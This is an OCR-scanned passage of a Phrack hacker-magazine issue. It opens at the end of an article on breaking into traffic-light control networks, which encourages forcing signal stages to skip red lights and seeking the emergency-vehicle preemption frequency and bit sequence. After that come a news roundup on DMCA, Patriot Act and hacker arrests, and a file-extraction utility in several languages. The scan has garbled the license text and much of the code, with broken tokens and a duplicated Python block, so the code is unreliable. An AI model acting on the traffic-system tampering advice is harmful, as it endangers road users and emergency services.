between destination A and B. Also the commands to force a stage is nice to 
have, UTC message - Fn ; now if your stuck behind a red light, and just 
sitting there polluting the air, just force to next stage in stream, and 

off you go without the guilt of crossing a red light ;) 


Also if you are browsing the LAN, look out for nifty info like, the source 
to the firmware of controllers since the firmware gets updated quite often. 
It might lay around on the dialup server or some internal ftp server. 

The exact frequency and bit sequence used to initiate the emergency cycle 
in the controllers, for ambulances and emergency vehicles is also nice. 
There is also the software that is used to commission the controllers 

and the hand unit for field monitoring. 


Of course hacking the traffic system can be abjo0zed and have disastrous 
effects, but i feel, if you have the skill to access a system like that, 
then you have the sense not to fsck it up. 


Wed Apr 26 09:43:44 2017 


15.txt Wed Apr 26 09:43:44 2017 1 


==Phrack Inc.== 


Volume O0x0b, Issue 0x3c, Phile #0x0f of 0x10 


| [ PHRACK WORLD N 


ea 
= 
n 


| [ phrackstaff ] | 


Content in Phrack World News does not reflect the opinion of any particluar 
Phrack Staff member. PWN is exclusively done by the scene and for the 
scene. 


Ox01: Phrack Headlines & Misc 

0x02: Freedom strikes back — DMCA loses the trial 

0x03: MS issues 71 security bulletins this year and counting... 
0x04: U.S. Patriot Act 


J=[ 0x01 - Phrack Headlines & Misc ] 


Video games with violent content are good for da kids! I KNEW IT! 
http://www.vnunet.com/News/1135410 


The News Media propose to not broadcast (i.e. to censor) certain 

reports. The ’Free’ media is turning (some say it already turned) into an 
instrument of the military. But dont worry too much about it: It’s all 
for our good! 

http://commondreams.org/views02/1218-01.htm 


Join the teleconference with the National infrastructure and Advisory 
Council. The Council advises the President of the United States on the 
security of information systems for critical infrastructure supporting 
other sectors of the economy, including banking and finance, 
transportation, energy, manufacturing, and emergency government services. 
At this meeting, the Council will continue its deliberations on comments 
to be delivered to President Bush concerning the draft National Strategy 
to Secure Cyberspac 
http://www.access.gpo.gov/su_docs/aces/fr-cont.html 


The promise of the newly formed Department of Homeland Security is to 
improve our nation’s security from terrorism. Unfortunately, the results 
are far more likely to be the opposite. 

http: //www.counterpane.com/crypto-gram-0212.htm1#3 


Kevin Mitnick wrote a book, "The Art of Deception". The first chapter 

has been deleted by the publisher at the last minute. It’s available 

on the internet: 

http: //www.wired.com/news/culture/0,1284,56187,00.html1 
http://littlegreenguy.fateback.com/chapterl/Chapter%201%20-%20Banned%20Edition.doc 


Cyberterrorism is just media hype. It’s yet another trick used by the 
military-industrial complex to suck the last cent out of your pocket. The 
world will not forget when the Pentagon announced the "best coordinated and 
most serious hacker attack against military installations". In the end it 
was one single script kid who tried a public exploit against some 
unimportant and unclassified military computer and gained access due to a 2 
year old bug. 
http://www.wired.com/news/infostructure/0,1377,56935,00.html 


Read this before you visit any other countries. Otherwise you may 
get arrested and prosecuted (in some cases executed!) in a foreign country 
for an activity that is _legal_ in your country: 


Flashn, a (famous) swedish hacker recently got arrested while trying to 
scape the United States border to Canada. It seems that he had stayed 

too long on his tourist visa. 

http://www.freeflashn.org/ 

http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg01684.html1 
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Sk8 is out of prison but not free yet: 
http://www.freesk8.org/ 


‘Analyzer’ is back in jail again: 
http://www.freeanalyzer.org/ 


‘Out of office’ mails are fucking annoying. Read about yet another 
reasons why you don’t want to use them: 
http://abcnews.go.com/sections/scitech/DailyNews/burglary021219.html 


Computer Crime Center opens: 
http: //www.thestate.com/mld/thestate/news/local/4763628.htm 


Get rooted while listening to mp3’s: 
http://news.com.com/2100-1001-978403.html?tag=fd_top 


Microsoft’s products have been left off a list compiled by the Defence 
Signals Directorate that aims to evaluate and advise whether software 

is appropriate for use by Australian Government agencies. 

http: //www.zdnet.com.au/newstech/security/story/0,2000024985,20270727,00.htm 


J=[ 0x02 - Freedom strikes back - DMCA loses the trial ] 


The Russian software company which had found itself on trial in an 
American court was acquitted on all counts of circumventing the DMCA. 


Elcomsoft’s woes began in August of last year, when programmer Dmitry 
Sklyarov was charged under the Digital Millennium Copyright Act’s 
circumvention 1201 clauses (one small part of which is under review by 
the Librarian of Congress) while visiting Las Vegas for a technical 
conference. Skylarov was imprisoned for his part in creating an Adobe 
eBook reader that permitted fair-use of copyright material, and 
imprisoned pending trial. 


"Today’s jury verdict sends a strong message to federal prosecutors 

who believe that tool makers should be thrown in jail just because a 
copyright owner doesn’t like the tools they build," said EFF Senior 

Intellectual Property Attorney Fred von Lohmann. 


http: //www.theregister.co.uk/content/55/28612.html1 
http://www.theregister.co.uk/content/6/28654.html 
http: //www.phrack-dont-give-a-shit-—about-dmca.org 
http://www.nytimes.com/2002/11/21/technology/21COPY.html 
http://www.theregister.co.uk/content/6/28223.html1 
http: //www.wired.com/news/business/0,1367,56504,00.html1 

http://www. fatwallet.com/forums/messageview.cfm?catid=18&threadid=126042 
http://news.com.com/2100-1023-976296.html 


|=[ 0x03 - MS issues 71 security bulletins this year and counting... J=-= 


Are you keeping up with all the patches Microsoft has issued? 
Microsoft has issued 71 security bulletins so far this year. One 
bulletin in particular, MSO2-069 (Flaw in Microsoft VM Could Enable 
System Compromise) issued December 11, addresses several problems with 
the Microsoft Virtual Machine (VM) used for Java code. Versions of the 
VM software through version 5.0.3805 are vulnerable. According to 
Microsoft, "The most serious of these issues could enable a Web sit 

to compromise your system and take actions such as changing data, 
loading and running programs, and reformatting the hard disk." The 
patch is a critical update, and everyone should install it. 


http://www.microsoft.com/security/security_bulletins/ms02-069.asp 


J=[ 0x04 - U.S Patriot Act ] 
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by, Ross Regnart 
Patriot Act redefine MAFIA and Others as "Terrorist Associates" 
Under the Patriot Act the U.S. Government can use a "new charge" to 


arrest Mob members. The Act redefined "Terrorist Association" as any 
criminal activity that may "relate" to supporting terrorists. 


For Prosecution, the U.S. Patriot Act merged common criminal activity 
with supporting terrorism: The ACT states: criminals and terrorists use the 
same criminal networks and organizations to "Market" illegal-drugs; both 
participate in and have an interest in world criminal activity." 


Police Can Now Use Secret Evidence Against Anyone: The Act opened a 
back door for police to use "Secret evidence" against non-terrorists and 
alleged criminals. Secret evidence ar vidence that has been gathers in 
an illegal manner, without the authorization of a judge by federal 
agencies. Government need only allege an individual or organization’s 
activities "relate" to a "criminal market that terrorists use or depend on 
for their support in order to cause an arrest and/or property confiscation. 


What is a "Terrorist Associate? The Patriot Act’s wording "relate to" 
"Join" "influence on" "assist" "support" and "criminal market" are so 
vague, government may charge as "Terrorist Associates" both legal and 
illegal businesses and individuals who never intended to support 
terrorists. It is foreseeable "illegal drug marketers" will be charged as 
"Terrorist Associates" since it is appears impossible to stop terrorists 
from using their networks to sell drugs or other criminal activity. Under 
the Act police need little probable cause to arrest citizens and only a 
"preponderance of evidence" to confiscate their property. Innocent citizens 
may find it difficult to defend against "secret evidence" and/or recover 
their confiscated bank accounts and other property. Under the Act 
"a government authority" to seize foreign bank accounts, need only claim 
that a financial transaction, account proceeds or property are "related" 
to criminal activity. 


Under the Patriot Act: U.S. and cooperating government authorities are 
not required to "trace" prove the source of a foreign bank or financial 
service account in order to seize all the proceeds therein. Should the 
United States or a government authority find that a foreign bank account 
has been drawn down or closed the government may "substitute for 
forfeiture" any other asset a government claims to belong to the alleged 
owner of a bank account then subject to forfeiture. Consequently, a 
government may "substitute for forfeiture" assets "equal" to the entire 
amount of all financial transactions and deposits that went through a 
foreign bank or financial service account during a given time period. 


Under the Patriot Act: the U.S. or a cooperating government authority 
is not required to prove what part of proceeds seized from a foreign bank 
or service account are "related" to criminal activity. The U.S. ora 
cooperating government authority may confiscate a foreign bank account and 
"never" inform its owners the reason for confiscation or the evidence 
against their account that caused its confiscation. Innocent account owners 
may be defenseless under such circumstances. 


Charged Defendants Under the Act start out guilty having to prove they 
did not reasonably have reason to know the person(s), organization or 
entity they associated or networked with had committed a terrorist act or 
would commit one in the future. 


What constitutes Terrorism under the Patriot Act may be arbitrarily 
decided by police: Any physical act that is legal or illegal may be alleged 
by police to be terrorism under 18USC 2331. Example: Union demonstrators 
fighting with strike breakers. No one need be injured for police to make a 
terrorist charge; demonstrators need only "appear intended to intimidate or 
coerce a Civilian population; or to influence the policy of a government". 
(See 18 USC 2331). 
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The Act’s mention of "related" criminal activity and networks permit 
government under the Act’s anti-terrorism provisions to use "secret 
evidence" against non-terrorists the government charges with being 
"Terrorist Associates". Government "secret evidence" can be used in both 
U.S. Military Tribunals and Civilian "Star Chamber Courts" as provided for 
by the Anti-Terrorism and Death Penalty Act of 1996. Defense against 
government-paid and/or other secret witnesses may be difficult when 
defendants are not allowed to learn the evidence against them. 


Under the U.S. Patriot Act the Government got the power from Congress 
to charge U.S. Citizens for crimes that "relate" to any activity that may 
support terrorists or threatens the safety, economy, national security, 
and/or U.S. or Foreign Policy of the United States. 


CONCERN: Like imprisoned foreign-terrorist suspects in the U.S., could 
American Citizens (non-terrorists) subsequently charged by the government 
as "Terrorist Associates", e.g., “related criminal activity" be next to 
lose their right to have confidential meetings with attorneys? Could U.S. 
Citizens be forced to give up attorney-client-privilege, endure government 
agents sitting at their table whenever an attorney comes to meet with them 
in jail? 


|=[ EO PWN ] 
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==Phrack Inc.== 
Volume O0x0b, Issue 0x3c, Phile #0x10 of 0x10 


| =-------- =[ PHRACK EXTRACTION UTILITY ]=-------- =| 


[ phrackstaff ] 


The Phrack Magazine Extraction Utility, first appearing in P50, isa 
convenient way to extract code from textual ASCII articles. It preserves 
readability and 7-bit clean ASCII codes. As long as there are no 
extraneous "<++>" or <-->" in the article, everything runs swimmingly. 


Source and precompiled version (windows, unix, ...) is available at 
http: //www.phrack.org/misc. 


| 
<++> extract/extract4.c !8e2bebc6 


/ 
extract.c by Phrack Staff and sirsyko 


Copyright (c) 1997 - 2000 Phrack Magazine 
All rights reserved. 


Redistribution and use in source and binary forms, with or without 

modification, are permitted provided that the following conditions 

are met: 

1. Redistributions of source code must retain the above copyright 
notice, this list of conditions and the following disclaimer. 

2. Redistributions in binary form must reproduce the above copyright 
notice, this list of conditions and the following disclaimer in the 
documentation and/or other materials provided with the distribution. 


HIS SOFTWARE IS PROVIDED BY TH 


Ei AUTHOR AND CONTRIBUTORS *‘*‘AS IS’’ AND 
NY EXPRESS OR IMPLIED WARRAN 


S, INCLUDING, BUT NOT LIMITED TO, TH 
ILITY AND FITNESS FOR A PARTICULAR P 


WH 


I 
MPLIED WARRANTIES OF MERCHANTA RPOSI 


E DISCLAIMED. IN NO 


R 
iVENT SHALL THE AUTHOR OR CONTRIBUTORS BE 


U 
sLTLABLE 


R I 
OR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 
S 


R SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 


U 


IABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTH 
UT OF THE USE OF THIS SOFTWARE, EV 


RWISE) ARISING IN ANY WAY 
OF THE POSSIBILITY OF 


B 
ED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 
D 


5 


IN IF ADVISE 


5 


T 
A 
I 
A 
F 
DAMAGES (INCLUDING, BUT NO LIMITED TO, PROCUREMENT OF SUBSTITUTE GOOD 
O 
H 
L 
O 
iS) 


extract.c 

Extracts textfiles from a specially tagged flatfile into a hierarchical 
directory structure. Use to extract source code from any of the articles 
in Phrack Magazine (first appeared in Phrack 50). 


Extraction tags are of the form: 


host:~> cat testfile 
irrelevant file contents 

<t++> path_and_filenamel !CRC32 
file contents 
<--> 
irrelevant file contents 

<++> path_and_filename2 !CRC32 
file contents 
<--> 
irrelevant file contents 

<t++> path_and_filenamen !CRC32 
file contents 


+ + + + + + + FF FF FF FF FF FF FF FF FF F F FF FF F FF F FF FF FF FF F FF *F *F FF FF FF FF F F FF F KF KF OF 


fo) 


+ + + + + FF + + F + F FF FF FF FF FF FF FF F F FF F FF F KF KF OF 


Pepe pe pe pe pe pe pe pe 


}; 


QQ. 
0) 


o20Aa0a£0 0 0, 
0ooooo o 
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<--> 
irrelevant file contents 
EOF 
The ‘!CRC* is optional. The filename is not. To generate crc32 values 


for your files, simply give them a dummy value initially. The program 
will attempt to verify the cre and fail, dumping the expected cre value. 
Use that one. i.e.: 


host:~> cat testfile 

this text is ignored by the program 

<++> testarooni !12345678 

text to extract into a file named testarooni 
as is this text 

<--> 


host:~> ./extract testfile 
Opened testfil 

- Extracting testarooni 

erc32 failed (12345678 != 4a298f18) 
Extracted 1 file(s). 


You would use ‘4a298f18* as your cre value. 


Compilation: 
gcc -o extract extract.c 


./extract filel file2 ... filen 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <sys/stat.h> 
nclude <sys/types.h> 
nclude <string.h> 
nclude <dirent.h> 
nclude <fcntl.h> 
nclude <unistd.h> 
nclude <errno.h> 


fine VERSION "Tniner.20000430 revsion q" 
fine BEGIN_TAG "<++> " 

Fine END_TAG "<-->" 

fine BT_SIZE strlen (BEGIN_TAG) 

fine ET_SIZE strlen (END_TAG) 

fine EX_DO_CHECKS 0x01 

fine EX_QUIE 0x02 


struct f_name 


u_char name[256]; 
struct f_name *next; 


unsigned long crcTable[256]; 


void crcegen () 


{ 


unsigned long crc, poly; 
INL, “a4 

poly = OxEDB88320L; 

for (i = 0; i < 256; i++) 
{ 


cre = i; 


for (j Oy ad, OR =>) 
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{ 
ME Ore 1) 
{ 
cre = (crc >> 1) * poly; 
} 
else 
{ 
cre >>= 1; 
} 
} 
ercTable[i] = crc; 


as 


unsigned long check_crc(FILE * 


{ 


fp) 


register unsigned long crc; 


c) 


ERSION) ; 


int ‘¢; 
crc = OxFFFFFFFF; 
while( (c = getc(fp)) != EOF ) 
{ 
cre = ((cre >> 8) & OxOOFFFFFF) * crcTable[(cre % 
} 
if (fseek(fp, 0, SEEK_SET) == -1) 
{ 
perror("fseek"); 
exit (EXIT_FAILURE) ; 
} 
return (cre * OXxXFFFFFFFF); 
} 
int 
main(int argc, char **argv) 
{ 
char *name; 
u_char b[256], *bp, *fn, flags; 
Ent. 1; J =~, “Aa = 0, sc} 
unsigned long cre = 0, crc_f = 0; 
FILE *in_p, *out_p = NULL; 
struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL; 
while ((c = getopt(argc, argv, "cqv")) != EOF) 
{ 
switch (c) 
{ 
case 'c’: 
flags |= EX_DO_CHECKS; 
break; 
case 'q’: 
flags |= EX_QUIET; 
break; 
case 'v': 
fprintf(stderr, "Extract version: %s\n", V 
exit (EXIT_SUCCESS) ; 
} 
} 
c = arge —- optind; 
Tt. eK: 92) 


fprintf(stderr, 


exit (0); 


"Usage 


23S filel file2 


[-cqv] 


filen\n" 


, 


& OxFF]; 


argv[0]); 
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* Fill the f_name list with all the files on the commandline (ignoring 


* argv[0] which is this executable). 


This includes globs. 


* / 
for (i = 1; (fn = argv[it+]); ) 
{ 
if (!head) 
{ 
if (! (head = (struct f_name *)malloc(sizeof (struct f_name) ))) 
{ 
perror ("malloc"); 
exit (EXIT_FAILURE) ; 
} 
strncpy (head->name, fn, sizeof (head->name) ) ; 
head->next = NULL; 
fn_p = head; 
} 
else 
{ 
if (!(fn_p->next = (struct f_name *)malloc(sizeof (struct f_name) ))) 
{ 
perror ("malloc"); 
exit (EXIT_FAILURE) ; 
} 
fn_p = fn_p->next; 
strncpy(fn_p->name, fn, sizeof (fn_p->name) ); 
fn_p->next = NULL; 
} 
} 
/* 
* Sentry node. 
Ke. 
if (!(fn_p->next = (struct f_name *)malloc(sizeof (struct f_name) )) ) 


perror ("malloc"); 
exit (EXIT_FAILUR 


GJ 


); 
} 

fn_p = fn_p->next; 

fn_p->next = NULL; 


* 
te Check each file in the f_name list for extraction tags. 
* 
a (fn_p = head; fn_p->next; ) 
if ('!strcemp(fn_p->name, "-")) 

in_p = stdin; 

name = "stdin"; 
see if ('!(in_p = fopen(fn_p->name, 


{ 


Hew) )) 


fprintf(stderr, "Could not open input file %s.\n", fn_p->name) ; 


fn_p = fn_p->next; 
continue; 


else 
{ 
name = fn_p->name; 
} 
if (!(flags & EX_QUIET) ) 
{ 
fprintf(stderr, "Scanning %s...\n", fn_p-—>name) ; 


} 


crcgen(); 
while (fgets(b, 256, in_p)) 
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if (!strncmp(b, BEGIN_TAG, BT_SIZ! 


j++; 
cre = 0; 
crc_f = 0; 
if ((bp = strchr(b + BT_SIZE + 1, '/’))) 
{ 
while (bp) 
{ 
“bp = 0; 
if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST) 
{ 
perror ("mkdir"); 
exit (EXIT_FAILURE) ; 
} 
*bp = '/'; 
bp = strchr(bp + 1, '/'); 
} 
} 
if ((bp = strchr(b, '!’))) 
{ 
CrenTr = 
strtoul((b + (strlen (b) strlen(bp)) + 1), NULL, 16); 
b[strlen(b) strlen(bp) - 1] = 0; 
hc S<L; 
} 
else 
{ 
h_c = 0; 
} 
if ((out_p = fopen(b + BT_SIZE, "wb+"))) 
{ 
fprintf(stderr, ". Extracting %s\n", b + BT_SIZE); 
} 
else 
{ 
printf(". Could not extract anything from ’%s’.\n", 
b + BI_SIZE); 
continue; 
} 
} 
else if (!strncemp (b, END_TAG, ET_SIZE) ) 
{ 
if (out_p) 
{ 
if (h_c == 1) 
{ 
if (fseek(out_p, Ol, 0) == -1) 
{ 
perror("fseek"); 
exit (EXIT_FAILURE) ; 
} 
crc = check_crc(out_p); 
if (cre == crce_f && ! (flags & EX_QUIET) ) 
{ 
fprintf(stderr, ". CRC32 verified (%081x)\n", crc); 
} 
else 
{ 
if (!(flags & EX_QUIET) ) 
{ 
fprintf(stderr, ". CRC32 failed (%081x != %081x)\n", 
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[EA 
~~ 
~~ 


b[strlen(b) - 1] = 0; 


Cres f,, Crs). ; 


/* Now we have a string. */ 
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} 
} 
fclose(out_p); 
} 
else 
{ 
fprintf(stderr, ". ‘%s* had bad tags.\n", fn_p->name) ; 
continue; 
} 
} 
else if (out_p) 
{ 
fputs(b, out_p); 
} 
} 
if (in_p != stdin) 
{ 
fclose(in_p); 
} 
tmp = fn_p; 
fn_p = fn_p->next; 
free (tmp); 


printf("No extraction tags found in list.\n"); 
} 
else 


{ 


printf ("Extracted %d file(s).\n", 4); 
} 
return (0); 
} 
/* EOF */ 
<--> 
<++> extract/extract.pl !1a19d427 
# Daos <daos@nym.alias.net> 
#!/bin/sh # -*- perl -* n 
val ’exec perl $0 -S S${1+"S@"}’ if 0; 


Sopening=0; 


if (/*\<\+\+\>/) {Scurfile = substr($_, 5); Sopening=1;}; 
if (/*\<\-\-\>/) {close ct_ex; Sopened=0;}; 
if (Sopening) { 
chop $curfile; 
Ssex_dir= substr( $curfile, 0, ((rindex($curfile,’/’))) ) if (Scurfile =~ m/\//); 
eval {mkdir $sex_dir, "0777"; }; 
open (ct_ex, ">Scurfile"); 
print "Attempting extraction of Scurfile\n"; 
Sopened=1; 


} 
if (Sopened && !Sopening) {print ct_ex S$_}; 
<--> 


<++> extract/extract.awk !26522c51 
'/usr/bin/awk -f 


Yet Another Extraction Script 
— <sirsyko> 


/*\<\t\t\>/ { 


ind = 1 

File = $2 

split ($2, dirs, "/") 
Dir="." 


while ( dirs[indt1] ) { 
Dir=Dir"/"dirs [ind] 
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system ("mkdir " Dir" 2>/dev/null") 
++ind 
} 
next 
} 
/*\<\-\-\>/ { 
File ="" 
next 
} 


File { print >> File } 


<--> 
<++> extract/extract.sh !a81a2320 
#!/bin/sh 


exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko> 


note, this file will create all directories relative to the current directory 
originally a bug, I’ve now upgraded it to a feature since I dont want to deal 
with the leading / (besides, you dont want hackers giving you full pathnames 
anyway, now do you :) 

Hopefully this will demonstrate another useful aspect of IFS other than 
haxoring rewt 


Usage: ./extract.sh <filename> 


cat $* | ( 
Working=1 
while [ S$Working ]; 
do 
OLDIFS1="SIFS" 
IFS= 
if read Line; then 
IFS="SOLDIFS1" 
set -- SLine 
case "$1" in 
"<++>") OLDIFS2="SIFS" 
IFS=/ 
set -- $2 
IFS="SOLDIFS2" 
while [ S# -gt 1 ]; do 
File=${File:-"."}/S1 
if [ ! -d $File ]; then 
echo "Making dir $File" 
mkdir $File 


fi 

shift 
done 
File=${File:-"."}/S1 


echo "Storing data in S$File" 


"<-->" ) Tf [— “"xSFide™ != x jy then 
unset File 
Be pep 
*) if [ "x$File" != "x" ]; then 
IFS= 
echo "SLine" >> SFile 
IFS="SOLDIFS1" 
fi 
rr 
esac 
IFS="SOLDIFS1" 
else 
echo "End of file" 
unset Working 
fi 
done 
) 
<--> 


<++> extract/extract.py !83f65f60 
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! /bin/env python 
extract.py Timmy 2tone <_spoon_@usa.net> 


import sys, string, getopt, os 


class Datasink: 
"""Looks like a file, but doesn’t do anything.""™" 
def write(self, data): pass 
def close(self): pass 


def extract (input, verbose = 1): 
"""Read a file from input until we find the end token.™"™" 


if type(input) == type(’string’): 
fname = input 
try: input = open(fname) 
except IOError, (errno, why): 
print "Can’t open Ss: %s" % (fname, why) 
return errno 
else: 
fname = ’<file descriptor %d>’ % input.fileno() 
inside_embedded_file = 0 
linecount = 0 
line = input.readline() 
while line: 
if not inside_embedded_file and line[:4] == ’<++>’: 
inside_embedded_file = 1 
linecount = 0 
filename = string.strip(line[4:]) 
if mkdirs_if_any(filename) != 0: 
pass 
try: output = open(filename, 'w’) 


except IOError, (errno, why): 
print "Can’t open %s: %s; skipping file" % (filename, why) 
output = Datasink() 
continue 


if verbose: 


print ’Extracting embedded file %s from %s...’ % (filename, 
fname), 
elif inside_embedded_file and line[:4] == '’<-->’: 
output.close() 
inside_embedded_file = 0 


if verbose and not isinstance(output, Datasink): 
print ’[%d lines]’ % linecount 


elif inside_embedded_fil 
output.write (line) 


Else keep looking for a start token. 
line = input.readline() 
linecount = linecount + 1 
def mkdirs_if_any(filename, verbose = 1): 


"""Check for existance of /’s in filename, and make directories.""" 


path, file = os.path.split (filename) 
if not path: return 


errno 0 
start = os.getcwd() 
components = string.split (path, os.sep) 
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for dir in components: 
if not os.path.exists (dir): 
try: 
os.mkdir (dir) 
if verbose: print ’Created directory’, path 


except os.error, (errno, why): 
print "Can’t make directory %s: Ss" % (dir, why) 
break 


try: os.chdir (dir) 

except os.error, (errno, why): 
print "Can’t cd to directory %s: $s" % (dir, why) 
break 


os.chdir(start) 
return errno 


def usage(): 
wee "Blah. ww 
die(’Usage: extract.py [-V] filename [filename...]’) 


def main(): 
try: optlist, args = getopt.getopt(sys.argv[1:], ’V’) 
xcept getopt.error, why: usage() 
if len(args) <= 0: usage() 


if (’-v’, ‘'’) in optlist: verbose = 0 
lse: verbose = 1 


for filename in args: 
if verbose: print ’Opening source file’, filename + ’... 
extract (filename, verbose) 


def db(filename = ’P51-11’): 
"""Run this script in the python debugger.""" 
import pdb 
sys.argv[1:] = [’-v’, filename] 


pdb.run(’extract.main()’) 


def die(msg, errcode = 1): 
print msg 
sys.exit (errcode) 
if name == main__’: 
try: main () 
except KeyboardiInterrupt: pass 


xcept getopt.error, why: usage() 
if len(args) <= 0: usage() 


if (’-v’, ‘'’) in optlist: verbose = 0 
lse: verbose = 1 


for filename in args: 
if verbose: print ’Opening source file’, filename + ’... 
extract (filename, verbose) 


def db(filename = ’P51-11’): 
"""Run this script in the python debugger.""" 
import pdb 
sys.argv[1:] = [filename] 


pdb.run(’extract.main()’) 


def die(msg, errcode = 1): 
print msg 
sys.exit (errcode) 


if name == '  main__’ 

try: main() 

except KeyboardInterrupt: pass # No messy traceback. 
<--> 


<++> extract/extract-win.c !e519375d 
[BORK KKK KK KK KK I I I I I RR KK / 


/* WinExtract A 
/* a, 
/* Written by Fotonik <fotonik@game-master.com>. */, 
hess es 
/* Coding of WinExtract started on 22aug98. Kf 
[* if 
/* This version (1.0) was last modified on 22aug98. iy 
fe *f 
/* This is a Win32 program to extract text files from a specially tagged ty 
/* flat file into a hierarchical directory structure. Use to extract Kap 
/* source code from articles in Phrack Magazine. The latest version of ef: 
/* this program (both source and executable codes) can be found on my Ay 
/* website: http://www.altern.com/fotonik * / 


[BORK KKK KK KK KK I I KI A A I I A I KK / 


include <stdio.h> 
include <string.h> 
include <windows.h> 


void PowerCreateDirectory(char *DirectoryName) ; 


x 


nt WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevinst, 
LPSTR lpszArgs, int nWinMode) 


= 


{ 

OPENFILENAME OpenFile; /* Structure for Open common dialog box */ 
char InFileName[256]=""; 

char OutFileName [256]; 

char Title[]="WinExtract - Choose a file to extract files from."; 
FILE *InFile; 

FILE *OutFile; 

char Line[256]; 

char DirName[256]; 

int FileExtracted=0; /* Flag used to determine if at least one file was */ 
int i; /* extracted */ 


ZeroMemory (&OpenFile, sizeof (OPENFILENAME) ) ; 
OpenFile.1StructSize=sizeof (OPENFILENAME) ; 
OpenFile.hwndOwner=HWND_DESKTOP; 
OpenFile.hInstance=hThisInst; 
OpenFile.lpstrFile=InFileName; 
OpenFile.nMaxFile=sizeof (InFileName) -1; 
OpenFile.lpstrTitle=Title; 
OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY; 


if (GetOpenFileName (&OpenFile) ) 
{ 
if ((InFile=fopen (InFileName, "r") )==NULL) 
{ 
MessageBox (NULL, "Could not open file.",NULL,MB_OK) ; 
return 0; 


} 


/* If we got here, InFile is opened. */ 
while (fgets (Line, 256, InFile) ) 
{ 
if (!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */ 
{ 
Line [strlen (Line)-1]=’\0’; 


16.txt Wed Apr 26 09:43:44 2017 11 
strepy (OutFileName, Linet5); 


/* Check if a dir has to be created and create one if necessary */ 
for (i=strlen (OutFileName) -1;i1>=0; i--) 
{ 
if ((OutFileName [i]=='’\\"’) || (OutFileName[i]==’/’)) 
{ 
strncpy (DirName, OutFileName, i); 
DirName[i]=’\0’; 
PowerCreateDirectory (DirName) ; 
break; 


} 


} 


if ((OutFile=fopen (OutFileName, "w") )==NULL) 


{ 
MessageBox (NULL, "Could not create file.",NULL,MB_OK); 


fclose(InFile); 
return 0; 


} 


/* If we got here, OutFile can be written to */ 
while (fgets (Line, 256, InFile) ) 
{ 


if (strncemp (Line, "<-->",4)) /* If line doesn’t begin w/ "<-->" */ 
fputs (Line, OutFile); 
} 


else 


break; 


} 
fclose(OutFile); 
FileExtracted=1; 


} 
fclose(InFile); 
if (FileExtracted) 
{ 
MessageBox (NULL, "Extraction sucessful.","WinExtract",MB OK); 
} 
else 
{ 
MessageBox (NULL, "Nothing to extract.","Warning",MB OK); 


} 


} 


return 1; 


/* PowerCreateDirectory is a function that creates directories that are */ 
/* down more than one yet unexisting directory levels. (e.g. c:\1\2\3) */ 
void PowerCreateDirectory(char *DirectoryName) 

{ 

int i; 

int DirNameLength=strlen(DirectoryName) ; 

char DirToBeCreated[256]; 


for (i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */ 
{ /* create '/' */ 
if ((DirectoryName[i]==’\\"') || (DirectoryName[iJ=='/’) | | 
(i==DirNameLength-1) ) 
{ 
strncpy (DirToBeCreated, DirectoryName,i+1); 
DirToBeCreated[it1]=’\0’'; 
CreateDirectory (DirToBeCreated, NULL) ; 


} 
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|=[ EOF ] 


